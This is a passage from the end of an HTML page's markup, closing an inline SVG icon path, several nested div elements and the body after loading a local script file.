                d="M15.392 2.673a1.5 1.5 0 0 1 2.119-.115A10.475 10.475 0 0 1 21 10.375c0 5.8-4.701 10.5-10.5 10.5v-3a7.5 7.5 0 0 0 5.007-13.084a1.5 1.5 0 0 1-.115-2.118Z"
                transform="translate(1.5 1.625)"></path>
            </g>
          </svg>
        </div>
      </div>
    </div>
  </div>
  <script src="/js/script.js"></script>
</body>
</html>